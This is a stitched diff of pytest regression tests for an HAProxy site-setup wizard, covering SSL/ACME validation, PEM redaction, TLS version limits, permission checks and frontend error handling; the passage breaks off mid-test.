def test_upload_mode_rejects_empty_private_key_content():
payload = _payload(ssl_mode="upload")
payload["ssl"] = {**payload["ssl"], "private_key_content": ""}
with pytest.raises(ValidationError) as ei:
SiteCreate(**payload)
assert "private_key_content" in str(ei.value)
def test_upload_mode_rejects_non_pem_text():
payload = _payload(ssl_mode="upload")
payload["ssl"] = {**payload["ssl"], "certificate_content": "not a pem"}
with pytest.raises(ValidationError) as ei:
SiteCreate(**payload)
assert "PEM" in str(ei.value) or "BEGIN" in str(ei.value)
def test_upload_mode_rejects_missing_cert_name():
payload = _payload(ssl_mode="upload")
payload["ssl"] = {**payload["ssl"], "name": ""}
with pytest.raises(ValidationError) as ei:
SiteCreate(**payload)
assert "ssl.name" in str(ei.value) or "name" in str(ei.value)
def test_existing_mode_requires_ssl_certificate_id():
payload = _payload(ssl_mode="existing")
payload["ssl"] = {"mode": "existing"} # missing ssl_certificate_id
with pytest.raises(ValidationError) as ei:
SiteCreate(**payload)
assert "ssl_certificate_id" in str(ei.value)
# ----------------------------------------------------------------------------
# SSLChoice basic shape
# ----------------------------------------------------------------------------
def test_ssl_choice_default_https_bind_port_443():
# SSLChoice itself does NOT enforce PEM content (the model_validator on
# SiteCreate does); SSLChoice only enforces mode literal.
s = SSLChoice(mode="upload", name="x", certificate_content="X", private_key_content="Y")
assert s.https_bind_port == 443
def test_ssl_choice_acme_default_auto_renew_true():
s = SSLChoice(mode="acme")
assert s.auto_renew is True
def test_ssl_choice_invalid_mode_rejected():
with pytest.raises(ValidationError):
SSLChoice(mode="self-signed")
# ----------------------------------------------------------------------------
# ServerStep
# ----------------------------------------------------------------------------
def test_server_step_port_range_validated():
with pytest.raises(ValidationError):
ServerStep(server_name="s", server_address="10.0.0.1", server_port=70000)
def test_server_step_weight_default_100():
s = ServerStep(server_name="s", server_address="10.0.0.1", server_port=80)
assert s.weight == 100
# ----------------------------------------------------------------------------
# _strip_pem_from_payload (M14/M9)
# ----------------------------------------------------------------------------
def test_strip_pem_removes_private_key_content():
payload = {
"ssl": {
"mode": "upload",
"name": "cert",
"certificate_content": "-----BEGIN CERT-----",
"private_key_content": "-----BEGIN PRIVATE KEY-----",
"chain_content": "-----BEGIN CERT-----",
},
}
out = _strip_pem_from_payload(payload)
assert out["ssl"]["private_key_content"] == ""
assert out["ssl"]["certificate_content"] == ""
assert out["ssl"]["chain_content"] == ""
# Non-sensitive fields preserved.
assert out["ssl"]["mode"] == "upload"
assert out["ssl"]["name"] == "cert"
def test_strip_pem_recurses_into_lists():
payload = {
"servers": [
{"server_name": "s1", "private_key": "K1", "ssl_enabled": True},
{"server_name": "s2", "private_key": "K2", "ssl_enabled": False},
],
}
out = _strip_pem_from_payload(payload)
for s in out["servers"]:
assert s["private_key"] == ""
def test_strip_pem_preserves_unrelated_fields():
payload = {
"domains": ["www.example.com"],
"cluster_id": 1,
"ssl": {"mode": "none"},
}
out = _strip_pem_from_payload(payload)
assert out == payload # No PEM fields present → identical
def test_strip_pem_handles_primitive_values():
"""Top-level primitives should pass through unchanged."""
assert _strip_pem_from_payload(123) == 123
assert _strip_pem_from_payload("hello") == "hello"
assert _strip_pem_from_payload(None) is None
assert _strip_pem_from_payload([1, 2, 3]) == [1, 2, 3]
@@ -0,0 +1,57 @@
"""v1.5.0 R13 — Bulgu #v1: ssl.account_id must be validated.
Before R13, the wizard accepted any truthy `ssl.account_id` and used it
directly:
acme_account_id = body.ssl.account_id or _resolve_default_acme_account()
This let `account_id=999` (deleted, typo, cross-tenant) bypass validation
and surface much later as an FK violation deep inside
create_order_staged — the user saw a generic 500 long after submit.
R13 fix: explicitly look up letsencrypt_accounts by id and reject
non-existent or non-valid accounts with a clear 400 right at the
pre-flight gate.
These are static source-level assertions to guard against regressions.
"""
from pathlib import Path
SOURCE = (
Path(__file__).resolve().parent.parent
/ "routers"
/ "site_wizard.py"
).read_text()
def test_account_id_existence_check_present():
"""The ACME branch must SELECT from letsencrypt_accounts by the user-
supplied id BEFORE proceeding."""
# Look for the explicit ID lookup query.
assert "FROM letsencrypt_accounts" in SOURCE
assert "body.ssl.account_id" in SOURCE
def test_account_id_status_validity_check_present():
"""Beyond existence, the account's status must be 'valid'. The fix
rejects any other status (e.g. 'revoked', 'deactivated') with 400."""
assert 'row["status"] != "valid"' in SOURCE, (
"Bulgu #v1 regression: ssl.account_id must be rejected when the "
"account exists but has been deactivated/revoked. Otherwise the "
"wizard happily stages an order against an unusable LE account."
)
def test_account_id_uses_400_not_500():
"""The validation error must surface as a clear 400 (user fixable)
rather than letting the FK violation bubble up as a generic 500."""
# Look for both the 400 status_code and the human-readable message.
assert 'status_code=400' in SOURCE
assert 'does not exist' in SOURCE
def test_account_id_none_falls_back_to_default():
"""When account_id is omitted (None), the wizard must still fall back
to _resolve_default_acme_account so single-account installs don't
regress."""
assert "body.ssl.account_id is not None" in SOURCE
assert "_resolve_default_acme_account" in SOURCE
@@ -0,0 +1,49 @@
"""v1.5.0 R12 — ACME mode must pre-check HTTPS frontend collisions.
Bulgu #f10: previously the create_proxied_host pre-flight only checked
the HTTPS frontend's name and bind port for upload/existing modes —
ACME deferred the entire HTTPS frontend creation to
_execute_post_completion_actions. That meant a bind-443 collision
(e.g. another wizard run already grabbed it) was only detected AFTER
Let's Encrypt issued the cert, costing the tenant an LE rate-limit
quota on a doomed order.
Fix: pre-check for ALL https-creating modes (upload, existing, acme).
ACME's deferred path keeps its own collision check too (defense in
depth) — but the user gets a clear 400 up front instead of a confusing
post-completion error long after they hit Submit.
These are static source-level assertions.
"""
from pathlib import Path
SOURCE = (
Path(__file__).resolve().parent.parent
/ "routers"
/ "site_wizard.py"
).read_text()
def test_create_proxied_host_acme_precheck_https_collision():
"""create_proxied_host's pre-flight gate must include 'acme' in the
https-creating mode set."""
# Look for the literal tuple membership check.
assert 'body.ssl.mode in ("upload", "existing", "acme")' in SOURCE, (
"Bulgu #f10 regression: create_proxied_host's HTTPS frontend "
"pre-check must run for ACME mode too — otherwise users only "
"discover the collision after burning an LE rate-limit quota."
)
def test_preview_acme_precheck_https_collision_warning():
"""The same gate must apply on /preview to surface the warning before
the user clicks Submit."""
# Either the literal tuple appears twice (once each in
# create_proxied_host and preview_create) OR a unified helper. The
# current implementation duplicates the literal — pin it.
occurrences = SOURCE.count('body.ssl.mode in ("upload", "existing", "acme")')
assert occurrences >= 2, (
"Bulgu #f10 regression: both POST / and POST /preview must include "
"'acme' in the HTTPS frontend collision pre-check / warning gate."
)
+285
View File
@@ -0,0 +1,285 @@
"""v1.5.0 R12 — Advanced wizard fields (HAProxy 2.4+ tuning).
Round 12 expanded the wizard surface with:
- BackendStep: extended balance algorithms (parameter-FREE only — `hdr` /
`url_param` rejected because they need a parameter), fullconn, cookie
persistence, default-server-* defaults, request/response headers,
validator forbidding cookie persistence with mode='tcp'.
- FrontendStep: maxconn, rate_limit, timeouts, compression, log_separate,
monitor_uri, header injection, tcp_request_rules.
- ServerStep: extended ssl_verify Literal, TLS version Literals.
- SSLChoice: ALPN, ssl_min_ver, ssl_max_ver, ciphers, ciphersuites,
strict-sni, HSTS opt-in.
These tests guarantee:
1. New fields default to safe / unset values (BACKWARD COMPAT — existing
wizard payloads from v1.5.0 first deploy must still parse, AND the
neutral defaults must NOT silently change the cipher / ALPN / HSTS
profile of frontends created via direct API calls).
2. Field constraints are enforced (numeric ranges, Literal lists).
3. New TLS Literals cover HAProxy 2.4+ supported versions.
"""
import pytest
from pydantic import ValidationError
from models.site_wizard import (
BackendStep,
FrontendStep,
ServerStep,
SSLChoice,
)
# ----------------------------------------------------------------------------
# BackendStep advanced
# ----------------------------------------------------------------------------
def test_backend_step_new_balance_algorithms_accepted():
"""Round 12: only PARAMETER-FREE algorithms are accepted by the wizard.
Parametric ones (`hdr(name)`, `url_param(name)`) need an extra input
field that the wizard does not provide today — they are rejected to
avoid producing invalid HAProxy syntax (`balance hdr` without args)."""
for algo in ("roundrobin", "leastconn", "static-rr", "first", "source", "uri", "random"):
b = BackendStep(name="be_test", balance_method=algo)
assert b.balance_method == algo
@pytest.mark.parametrize("bad", ["hdr", "url_param", "rdp-cookie", "not-a-real-algo"])
def test_backend_step_invalid_balance_rejected(bad):
"""Parametric algorithms must be REJECTED until the wizard exposes a
parameter input. Otherwise HAProxy errors out at apply time with a
cryptic 'invalid keyword' message."""
with pytest.raises(ValidationError):
BackendStep(name="be_test", balance_method=bad)
def test_backend_step_cookie_on_tcp_mode_rejected():
"""Round 12 (Bulgu #f8): HAProxy `cookie` directive is HTTP-only.
The wizard must reject the combination at validation time so the
user gets a clear actionable error instead of an apply-time HAProxy
syntax failure."""
with pytest.raises(ValidationError, match="mode='http'"):
BackendStep(name="be_test", mode="tcp", cookie_name="SRVID")
def test_backend_step_cookie_on_http_mode_accepted():
"""Counter-test: cookie persistence on http mode is allowed."""
b = BackendStep(
name="be_test", mode="http", cookie_name="SRVID",
cookie_options="insert indirect nocache",
)
assert b.cookie_name == "SRVID"
def test_backend_step_tcp_mode_without_cookie_accepted():
"""Counter-test: TCP backend without cookie is fine."""
b = BackendStep(name="be_test", mode="tcp")
assert b.mode == "tcp"
assert b.cookie_name is None
def test_backend_step_advanced_defaults_unset():
b = BackendStep(name="be_test")
# New fields must default to None so existing payloads don't break.
assert b.fullconn is None
assert b.cookie_name is None
assert b.cookie_options is None
assert b.default_server_inter is None
assert b.default_server_fall is None
assert b.default_server_rise is None
assert b.request_headers is None
assert b.response_headers is None
def test_backend_step_cookie_persistence_roundtrip():
b = BackendStep(
name="be_test",
cookie_name="SRVID",
cookie_options="insert indirect nocache",
)
assert b.cookie_name == "SRVID"
assert b.cookie_options == "insert indirect nocache"
# ----------------------------------------------------------------------------
# FrontendStep advanced
# ----------------------------------------------------------------------------
def test_frontend_step_advanced_defaults_safe():
f = FrontendStep(name="fe_test")
# No defaults that would change existing behaviour.
assert f.maxconn is None
assert f.rate_limit is None
assert f.compression is False
assert f.log_separate is False
assert f.monitor_uri is None
assert f.tcp_request_rules is None
assert f.request_headers is None
assert f.response_headers is None
def test_frontend_step_rate_limit_must_be_non_negative():
with pytest.raises(ValidationError):
FrontendStep(name="fe_test", rate_limit=-1)
def test_frontend_step_maxconn_must_be_positive():
with pytest.raises(ValidationError):
FrontendStep(name="fe_test", maxconn=0)
# ----------------------------------------------------------------------------
# ServerStep advanced TLS literals
# ----------------------------------------------------------------------------
def test_server_step_ssl_verify_literal():
ServerStep(server_name="s", server_address="10.0.0.1", server_port=80, ssl_verify="none")
ServerStep(server_name="s", server_address="10.0.0.1", server_port=80, ssl_verify="required")
with pytest.raises(ValidationError):
ServerStep(server_name="s", server_address="10.0.0.1", server_port=80, ssl_verify="bogus")
# R18c audit fix (round 3 #15): TLSv1.0 / TLSv1.1 are formally
# deprecated by RFC 8996 and are now REJECTED by the wizard
# validators. The legacy assertion that "any of the four literal
# values is accepted" is therefore split: the modern values pass,
# the deprecated values raise ValidationError. This test is the
# back-compat hinge — if a future revision re-allows TLS 1.0 / 1.1
# for any reason, that change should be deliberate and visible
# here.
@pytest.mark.parametrize("ver", ["TLSv1.2", "TLSv1.3"])
def test_server_step_tls_version_literals(ver):
ServerStep(server_name="s", server_address="10.0.0.1", server_port=80, ssl_min_ver=ver)
@pytest.mark.parametrize("ver", ["TLSv1.0", "TLSv1.1"])
def test_server_step_tls_version_literals_rejects_deprecated(ver):
from pydantic import ValidationError
with pytest.raises(ValidationError):
ServerStep(
server_name="s",
server_address="10.0.0.1",
server_port=80,
ssl_enabled=True,
ssl_min_ver=ver,
)
def test_server_step_invalid_tls_version_rejected():
with pytest.raises(ValidationError):
ServerStep(server_name="s", server_address="10.0.0.1", server_port=80, ssl_min_ver="SSLv3")
# ----------------------------------------------------------------------------
# SSLChoice advanced TLS / HSTS
# ----------------------------------------------------------------------------
def test_ssl_choice_alpn_default_none_for_backward_compat():
"""Round 12 backward-compat fix: ssl_alpn default MUST be None at the
Pydantic layer. Setting a non-empty default ('h2,http/1.1') would
silently enable HTTP/2 on HTTPS frontends created via direct API
callers (or saved drafts from the v1.5.0 first deploy). The wizard
UI populates a sensible form-level initial value; the model stays
neutral."""
s = SSLChoice(mode="none")
assert s.ssl_alpn is None
def test_ssl_choice_min_tls_default_none_for_backward_compat():
"""Round 12 backward-compat fix: ssl_min_ver default MUST be None.
A 'TLSv1.2' default would silently disable TLSv1.0/1.1 for any
HTTPS frontend that previously left ssl_min_ver unset — a behaviour
change for direct API callers. The wizard UI populates 'TLSv1.2' as
a form initial value; the model stays neutral."""
s = SSLChoice(mode="none")
assert s.ssl_min_ver is None
def test_ssl_choice_explicit_alpn_and_tls_versions_pass_through():
"""When the wizard form sends 'h2,http/1.1' and 'TLSv1.2', the
model accepts and round-trips them unchanged."""
s = SSLChoice(mode="acme", ssl_alpn="h2,http/1.1", ssl_min_ver="TLSv1.2")
assert s.ssl_alpn == "h2,http/1.1"
assert s.ssl_min_ver == "TLSv1.2"
def test_ssl_choice_hsts_off_by_default():
s = SSLChoice(mode="none")
assert s.hsts_enabled is False
assert s.hsts_max_age == 31536000 # 1 year
assert s.hsts_include_subdomains is True
assert s.hsts_preload is False
def test_ssl_choice_strict_sni_off_by_default():
s = SSLChoice(mode="none")
assert s.ssl_strict_sni is False
# R18c audit fix (round 3 #15): same TLS 1.0 / 1.1 rejection as
# the ServerStep validator, but on the HTTPS frontend bind.
@pytest.mark.parametrize("ver", ["TLSv1.2", "TLSv1.3"])
def test_ssl_choice_tls_version_literals(ver):
SSLChoice(mode="none", ssl_min_ver=ver)
@pytest.mark.parametrize("ver", ["TLSv1.0", "TLSv1.1"])
def test_ssl_choice_tls_version_literals_rejects_deprecated(ver):
from pydantic import ValidationError
with pytest.raises(ValidationError):
SSLChoice(mode="none", ssl_min_ver=ver)
def test_ssl_choice_invalid_tls_version_rejected():
with pytest.raises(ValidationError):
SSLChoice(mode="none", ssl_min_ver="TLSv0.99")
def test_ssl_choice_rejects_unknown_auto_renew_before_days_field():
"""Round 12 (Bulgu #f3): the per-cert renew-before-days override is
NOT plumbed into the renewal scheduler — so the field is removed
from the wizard payload to avoid offering a placebo control. The
Pydantic model must NOT accept it (stale draft would otherwise
appear to set a value that is silently ignored)."""
# SSLChoice does NOT have auto_renew_before_days. Direct callers
# passing it get an extra-field error (or it's ignored, depending on
# extra=). The strict assertion is just that the model has no such
# attribute.
s = SSLChoice(mode="acme")
assert not hasattr(s, "auto_renew_before_days"), (
"auto_renew_before_days must remain unimplemented until v1.6.0 "
"renewal scheduler picks up per-cert overrides."
)
# ----------------------------------------------------------------------------
# Backward compat: payload from v1.5.0 first deploy (sans advanced) parses
# ----------------------------------------------------------------------------
def test_v15_payload_without_advanced_still_parses():
"""If a saved draft from the v1.5.0 first deploy lacked all the new
advanced fields, the model must still validate."""
minimal_backend = BackendStep(name="be_legacy", balance_method="roundrobin", mode="http")
assert minimal_backend.fullconn is None # absence is fine
minimal_frontend = FrontendStep(
name="fe_legacy", mode="http", bind_address="*", bind_port=80
)
assert minimal_frontend.maxconn is None
minimal_server = ServerStep(
server_name="srv1", server_address="10.0.0.1", server_port=8080
)
assert minimal_server.ssl_enabled is False
legacy_ssl_acme = SSLChoice(mode="acme", auto_renew=True)
# Backward-compat: defaults stay None so v1.5.0-first-deploy callers
# get the same HAProxy ssl-* directive set they got before R12.
assert legacy_ssl_acme.ssl_alpn is None
assert legacy_ssl_acme.ssl_min_ver is None
assert legacy_ssl_acme.hsts_enabled is False
@@ -0,0 +1,110 @@
"""v1.5.0 R16 #v3 — wizard error toast must surface server-side reason.
The backend's GlobalExceptionHandler wraps every error in a custom
envelope:
{"error": {"message": "...", "details": {"validation_errors": [...]}}}
Pre-R16 the wizard read `err.response.data.detail` (FastAPI default
shape), which is ALWAYS undefined under the envelope handler. Users
saw "Submit failed" / "Preview failed" / "Delete failed" generic
toasts while the real reason — RBAC denial, validation field path,
collision warning — was right there in the response, just at a
different path.
R16 fix: introduce a shared utils/apiError.js helper that unwraps the
modern envelope first AND falls back to the legacy `detail` shape;
swap every wizard-adjacent toast to use it.
These tests pin the helper's existence + integration so a future
refactor can't silently revert.
"""
from pathlib import Path
import pytest
_FRONTEND_SRC = Path(__file__).resolve().parent.parent.parent / "frontend" / "src"
if not _FRONTEND_SRC.exists():
pytest.skip(
f"frontend not present at {_FRONTEND_SRC}; backend-only container",
allow_module_level=True,
)
HELPER = _FRONTEND_SRC / "utils" / "apiError.js"
WIZARD = _FRONTEND_SRC / "components" / "SiteWizard.js"
DRAFTS = _FRONTEND_SRC / "components" / "SiteDrafts.js"
def test_helper_exists_and_exports_extractApiError():
assert HELPER.exists(), (
"R16-3 regression: utils/apiError.js missing. The shared "
"envelope-aware error extractor must live here so all wizard "
"components reuse one implementation."
)
src = HELPER.read_text()
assert "export const extractApiError" in src
assert "validation_errors" in src
assert "data.error" in src
assert "data.detail" in src, (
"R16-3 regression: helper must ALSO support the legacy `detail` "
"shape so non-envelope endpoints don't break."
)
def test_helper_handles_envelope_first():
"""Envelope path must be checked BEFORE the legacy detail path —
otherwise modern envelope errors fall through to the fallback
string. We match the EXECUTABLE statements (assignments) so that
any docblock mentioning the legacy shape doesn't false-positive
the ordering check."""
src = HELPER.read_text()
env_pos = src.find("const env = data.error")
legacy_pos = src.find("const detail = data.detail")
assert env_pos != -1, "expected `const env = data.error` assignment"
assert legacy_pos != -1, "expected `const detail = data.detail` assignment"
assert env_pos < legacy_pos, (
"R16-3 regression: helper must assign data.error BEFORE "
"data.detail. Otherwise modern envelope errors would fall "
"through to the legacy `detail` branch (which is undefined "
"under the GlobalExceptionHandler) and the fallback string "
"would always win."
)
def test_wizard_imports_helper():
"""SiteWizard must import extractApiError from utils/apiError."""
src = WIZARD.read_text()
assert "from '../utils/apiError'" in src or 'from "../utils/apiError"' in src
assert "extractApiError" in src
def test_wizard_no_longer_reads_response_detail_for_user_toasts():
"""Old `err?.response?.data?.detail || '...'` patterns must be gone
from the wizard — they only ever produced 'Submit failed' style
toasts because the envelope handler never sets `.detail`."""
src = WIZARD.read_text()
# Forbid the exact regression pattern.
forbidden_patterns = [
"err?.response?.data?.detail || 'Preview failed'",
"err?.response?.data?.detail || 'Submit failed'",
"err?.response?.data?.detail || 'Save draft failed'",
"err?.response?.data?.detail || 'Preflight failed'",
]
for p in forbidden_patterns:
assert p not in src, (
f"R16-3 regression: {p!r} reappeared in the wizard. Use "
"extractApiError(err, '<fallback>') instead so the user "
"sees the actual server-side reason."
)
def test_drafts_uses_helper_too():
"""SiteDrafts uses the same helper for fetch + delete."""
src = DRAFTS.read_text()
assert "extractApiError" in src
assert "err?.response?.data?.detail || 'Failed to load drafts'" not in src
assert "err?.response?.data?.detail || 'Delete failed'" not in src
@@ -0,0 +1,94 @@
"""v1.5.0 R14 #R14-3 — wizard cancel UX must not navigate on save fail.
Before R14, SiteWizard.handleCancel.onCancel awaited
handleSaveDraft() and ALWAYS navigated to /proxied-hosts/drafts —
even when the save itself failed. The user saw an error toast and
landed on an empty drafts list, losing all in-flight wizard state.
R14 fix: handleSaveDraft returns boolean (true on success, false on
failure); onCancel only navigates when the save succeeded.
Static source assertions on the React component.
"""
from pathlib import Path
import pytest
_WIZARD_PATH = (
Path(__file__).resolve().parent.parent.parent
/ "frontend"
/ "src"
/ "components"
/ "SiteWizard.js"
)
if not _WIZARD_PATH.exists():
pytest.skip(
f"frontend not present at {_WIZARD_PATH}; running in backend-only "
"container is expected — skip wizard JS source assertions",
allow_module_level=True,
)
WIZARD_JS = _WIZARD_PATH.read_text()
def test_handle_save_draft_returns_boolean():
"""The save-draft handler must return true on success and false on
failure so callers can branch on the outcome."""
assert "return true" in WIZARD_JS, (
"R14-3 regression: handleSaveDraft must `return true` on the "
"successful axios.post path."
)
assert "return false" in WIZARD_JS, (
"R14-3 regression: handleSaveDraft must `return false` in the "
"catch block. Otherwise handleCancel can't tell success from "
"failure and silently navigates the user away from the wizard."
)
def test_handle_cancel_branches_on_save_result():
"""handleCancel.onCancel must check the boolean from handleSaveDraft
and only navigate to the drafts list on success."""
assert "const ok = await handleSaveDraft();" in WIZARD_JS, (
"R14-3 regression: handleCancel must capture the boolean result "
"of handleSaveDraft so it can branch on success vs. failure."
)
# The navigate call must be guarded by the success branch.
assert "if (ok) {" in WIZARD_JS
# R18 rebrand: drafts page moved to /sites/drafts (was R17 /quick-
# setup/drafts; before that v1.5.0 /proxied-hosts/drafts). The
# legacy aliases still resolve for old bookmarks but new
# navigations target the current canonical path.
assert "navigate('/sites/drafts');" in WIZARD_JS
def test_handle_cancel_does_not_navigate_unconditionally():
"""The OLD pattern was an unconditional `await ...; navigate(...)`.
Lock that down across all rebrand generations: v1.5.0 /proxied-hosts/
drafts, R17 /quick-setup/drafts, R18 /sites/drafts. Any of those
appearing right after `await handleSaveDraft();` (without an `if (ok)`
guard in between) is a regression."""
bad_patterns = [
("v1.5.0 alias", (
" await handleSaveDraft();\n"
" navigate('/proxied-hosts/drafts');"
)),
("R17 alias", (
" await handleSaveDraft();\n"
" navigate('/quick-setup/drafts');"
)),
("R18 canonical", (
" await handleSaveDraft();\n"
" navigate('/sites/drafts');"
)),
]
for label, pat in bad_patterns:
assert pat not in WIZARD_JS, (
f"R14-3 regression ({label}): the old unconditional "
"`await; navigate;` pattern reappeared. handleCancel must "
"guard the navigate behind the boolean returned by "
"handleSaveDraft."
)
@@ -0,0 +1,145 @@
"""v1.5.0 R12 — Bug A regression: drafts permission relaxed.
After the v1.5.0 first deploy we observed `403 - Insufficient permissions`
for users who had ssl.read but no frontend.create / frontend.read. Drafts
are personal — every authenticated user with ANY of the
host-management permissions should be able to save / list / delete their
own drafts.
These tests are STATIC SOURCE assertions (no DB, no network) — they
verify that the routers/site_wizard.py module exposes a
`_can_use_wizard` helper and that the three draft endpoints are wired
through it instead of the original `check_user_permission(..., "frontend",
"create"/"read")` gate.
The point is to fail fast if a future refactor accidentally tightens the
RBAC again.
"""
from pathlib import Path
import pytest
SOURCE = (
Path(__file__).resolve().parent.parent
/ "routers"
/ "site_wizard.py"
).read_text()
def test_can_use_wizard_helper_exists():
assert "async def _can_use_wizard(" in SOURCE, (
"Bug A regression: routers/site_wizard.py must define "
"_can_use_wizard so drafts/suggest/preview share a single permission "
"check."
)
@pytest.mark.parametrize(
"endpoint_signature",
[
# GET /drafts
('@router.get("/drafts")', "_can_use_wizard"),
# POST /drafts
('@router.post("/drafts")', "_can_use_wizard"),
# DELETE /drafts/{draft_id}
('@router.delete("/drafts/{draft_id}")', "_can_use_wizard"),
# POST /preview
('@router.post("/preview"', "_can_use_wizard"),
],
)
def test_draft_endpoints_use_can_use_wizard(endpoint_signature):
decorator, expected_helper = endpoint_signature
idx = SOURCE.find(decorator)
assert idx >= 0, f"Decorator {decorator!r} missing from site_wizard.py"
# Look at the next ~60 lines after the decorator for the helper call.
snippet = SOURCE[idx : idx + 2200]
assert expected_helper in snippet, (
f"Bug A regression: endpoint at {decorator!r} no longer calls "
f"{expected_helper}. Drafts must remain accessible to read-only "
"wizard users."
)
def test_can_use_wizard_grants_read_only_users():
# The helper should accept frontends.read OR ssl.read — i.e. it must NOT
# be limited to *.create. We assert by looking for the literal tuple of
# candidate perms.
#
# R18c round 10 (CRITICAL): the resource keys MUST be PLURAL
# (frontends, backends) to match the seeded role permissions in
# database/migrations.py. Pre-round-10 this test pinned the
# singular form, which was technically present in the source
# but never matched any non-admin role's permissions JSONB at
# runtime — a textbook example of a static test passing while
# the runtime contract was broken. Now we assert both: the
# plural keys are PRESENT, and the singular keys are GONE.
assert '"frontends", "read"' in SOURCE
assert '"frontends", "create"' in SOURCE
assert '"backends", "create"' in SOURCE
assert '"backends", "read"' in SOURCE
assert '"ssl", "read"' in SOURCE
assert '"ssl", "create"' in SOURCE
# The legacy singular forms must NOT appear inside the
# _can_use_wizard candidate_perms tuple — but the SOURCE may still
# contain unrelated occurrences (e.g. `"frontend": {...}` in the
# preview response, `usage_type = "frontend"` SSL labels). We
# therefore narrow the check to the candidate_perms block via a
# balanced-paren walk identical to round 10's helper test.
start = SOURCE.find("candidate_perms = (")
assert start >= 0
open_at = SOURCE.find("(", start)
depth, end = 0, -1
for i in range(open_at, len(SOURCE)):
ch = SOURCE[i]
if ch == "(":
depth += 1
elif ch == ")":
depth -= 1
if depth == 0:
end = i
break
block = SOURCE[start:end + 1]
assert '"frontend", "read"' not in block
assert '"frontend", "create"' not in block
assert '"backend", "create"' not in block
assert '"backend", "read"' not in block
def test_can_use_wizard_admin_shortcut_present():
"""R12 perf fix (Bulgu #f9): admin users should bypass the roles query
entirely. The helper accepts an optional current_user dict and
short-circuits on `is_admin`."""
assert "current_user.get(\"is_admin\")" in SOURCE, (
"Bulgu #f9 regression: _can_use_wizard must short-circuit on "
"current_user['is_admin'] to avoid an unnecessary roles roundtrip "
"for admin callers."
)
def test_can_use_wizard_uses_single_get_user_permissions_call():
"""R12 perf fix: the helper must call get_user_permissions ONCE and
decide locally, not chain 6 sequential check_user_permission calls
(each opening a fresh DB connection)."""
# The new implementation imports get_user_permissions from
# auth_middleware and reads the dict in-memory.
assert "get_user_permissions" in SOURCE, (
"Bulgu #f9 regression: _can_use_wizard must use the bulk "
"get_user_permissions(user_id) helper, not 6 sequential "
"check_user_permission() round-trips."
)
def test_callers_pass_current_user_to_can_use_wizard():
"""Each call site must hand the current_user dict to _can_use_wizard
so the admin shortcut fires when applicable."""
# We expect every "_can_use_wizard(user_id, current_user=current_user)"
# call to appear at least once in the source. Less strict: the substring
# 'current_user=current_user' appears at least 5 times (suggest, preview,
# save_draft, list_drafts, delete_draft).
n = SOURCE.count("current_user=current_user")
assert n >= 5, (
f"Expected at least 5 _can_use_wizard call sites passing current_user; "
f"saw {n}. Did a refactor accidentally drop the kwarg from one of the "
"endpoints?"
)
@@ -0,0 +1,135 @@
"""v1.5.0 R18 — Wizard existing-cert list regression tests.
Pre-R18 the wizard called `axios.get('/api/ssl')` which is NOT a real
endpoint (the correct path is `/api/ssl/certificates`). Result:
- "Reuse existing cert" mode rendered an empty Select with "No data"
even when the cluster had cluster-specific AND global certs imported.
- The R17 server-side mTLS Select (per-server Advanced settings) was
similarly broken — same shared `existingCerts` state.
R18 fix:
1. Hit the correct endpoint: `/api/ssl/certificates?cluster_id={id}`.
2. Refetch the list whenever the user changes the cluster on Step 0
(Form.useWatch('cluster_id')) — global certs are unfiltered, but
cluster-specific certs MUST be scoped to the targeted cluster.
3. Empty / pre-cluster state surfaces an Alert telling the user
exactly what's needed (pick a cluster / no certs imported) instead
of a blank dropdown.
"""
import re
from pathlib import Path
import pytest
_WIZARD_JS = (
Path(__file__).resolve().parent.parent.parent
/ "frontend" / "src" / "components" / "SiteWizard.js"
)
def _src():
if not _WIZARD_JS.exists():
pytest.skip("frontend tree not mounted")
return _WIZARD_JS.read_text()
def test_wizard_calls_correct_ssl_certificates_endpoint():
"""Pre-R18 used '/api/ssl' (404). After R18 the wizard MUST call
/api/ssl/certificates with a cluster_id query param."""
src = _src()
assert re.search(
r"/api/ssl/certificates\?cluster_id=",
src,
), (
"R18 regression: wizard not calling /api/ssl/certificates "
"with cluster_id query — existing-cert dropdown will be empty"
)
def test_wizard_no_longer_calls_bare_api_ssl():
"""The bare /api/ssl endpoint does not exist; ensure no regression
re-introduces the call. We strip JS line comments first so the
historical reference in the explanatory comment doesn't trigger a
false positive."""
src = _src()
# Strip `// ... \n` line comments so we only assert against
# executable code. Block comments aren't relevant here.
code_only = re.sub(r"//[^\n]*", "", src)
bad = re.search(
r"axios\.\w+\(\s*['\"]/api/ssl['\"]",
code_only,
)
assert not bad, (
"R18 regression: an axios call to the bare '/api/ssl' path "
"reappeared in executable code — that path is a 404 and "
"renders the existing-cert dropdown empty"
)
def test_wizard_watches_cluster_id_for_refetch():
"""The cert list must refetch when the cluster changes — global
certs aside, cluster-specific certs scoped to cluster A must NOT
appear for a wizard targeting cluster B."""
src = _src()
assert re.search(
r"Form\.useWatch\(\s*['\"]cluster_id['\"]\s*,\s*form\s*\)",
src,
), (
"R18 regression: cluster_id no longer watched — switching the "
"cluster on Step 0 will not refresh the existing-cert list"
)
def test_wizard_clears_certs_when_no_cluster_selected():
"""Until the user picks a cluster, the existing-cert list must be
empty (the API requires cluster_id). Otherwise we'd surface stale
state from a previous render."""
src = _src()
# Look for the guard: if (!watchedClusterId) { setExistingCerts([])... }
assert re.search(
r"if\s*\(\s*!watchedClusterId\s*\)\s*\{[^}]*setExistingCerts\(\s*\[\s*\]\s*\)",
src,
re.DOTALL,
), (
"R18 regression: existing-cert list not cleared when cluster_id "
"is empty — Select will surface stale certs from a prior cluster"
)
def test_wizard_existing_mode_disables_select_until_cluster_picked():
"""The 'Reuse existing cert' Select must be disabled (and surfaced
with a helpful Alert) until a cluster is chosen on Step 0."""
src = _src()
# Locate the existing-mode block.
block = re.search(
r"if\s*\(\s*sslMode\s*===\s*['\"]existing['\"]\s*\)\s*\{(.*?)\}\s*if\s*\(\s*sslMode\s*===\s*['\"]acme['\"]",
src,
re.DOTALL,
)
assert block, "R18 regression: ssl.mode==='existing' UI block not found"
body = block.group(1)
assert "disabled={!hasCluster}" in body or "disabled={!watchedClusterId}" in body, (
"R18 regression: Existing-cert Select not disabled until a "
"cluster is picked"
)
assert "Pick a cluster on Step 1" in body or "Select a cluster first" in body, (
"R18 regression: missing helper text guiding the user to pick "
"a cluster first"
)
def test_wizard_omits_usage_type_filter():
"""The wizard must NOT pass usage_type=frontend to the API — the
same `existingCerts` array drives BOTH the HTTPS frontend Select
(Step 3) AND the per-server mTLS Select (Step 1 advanced). Filtering
server-side would hide perfectly valid choices."""
src = _src()
# Find the API call line.
call = re.search(r"/api/ssl/certificates\?cluster_id=[^`'\"]+", src)
